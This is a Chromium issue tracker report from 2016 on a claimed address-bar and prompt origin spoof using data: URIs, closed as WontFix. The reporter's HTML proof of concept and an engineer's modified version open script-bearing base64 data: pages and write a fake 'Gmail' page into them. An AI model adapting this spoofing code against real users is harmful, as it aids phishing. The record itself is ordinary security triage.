New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 599956 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Apr 2016
Cc:
mkwst@chromium.org
palmer@chromium.org
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security:chrome URL And Javascript Prompt Origin Spoof

Reported by nani528g...@gmail.com, Apr 1 2016 
Hi 

chrome URL And Javascript Prompt Origin Spoof will possible by using data uris

here is the poc html file


<a href="https://www.gmail.com:443." target="aa" onclick="setTimeout('fake()',100)"><h1>click me</h1></a>
<script>
function fake() {
var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=','aa');
t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!!--hack by xisigr</H1>';
}
</script>

if any user clicks the link we can execute javascript thourgh uris


just open poc in google chorme when u click you can able to execute xx
url.html
329 bytes View Download

Comment 1 by penny...@chromium.org, Apr 3 2016

Cc: palmer@chromium.org
Components: Security>UX
Hi Chris,

I'm wondering if you could help triage this bug (and add labels if appropriate)?  Thanks for your time!

Comment 2 by palmer@chromium.org, Apr 4 2016

Cc: mkwst@chromium.org
Status: WontFix (was: Unconfirmed)
It is working as intended for data: URIs to be able to contain JavaScript code. (Whether or not supporting top-level navigation to data: URIs is working as intended is, I understand, a point of debate. +mkwst for that.)

If you change the code to alert(document.domain), you can see that the code runs in the null origin, and that attempting to access document.cookie results in a security exception (look in the JavaScript console).

<a href="https://www.gmail.com:443." target="aa" onclick="setTimeout('fake()',100)"><h1>click me</h1></a>
<script>
function fake() {
//var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=','aa');
// document.domain:
//var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==','aa');
// document.cookie:
var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==','aa');
t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!!--hack by xisigr</H1>';
}
</script>

So, I don't see a bug here.
Project Member

Comment 3 by sheriffbot@chromium.org, Jul 12 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 4 by sheriffbot@chromium.org, Oct 1 2016 

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 5 by sheriffbot@chromium.org, Oct 2 2016 

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 6 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 7 by lafo...@chromium.org, Dec 9 2016

Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label

Sign in to add a comment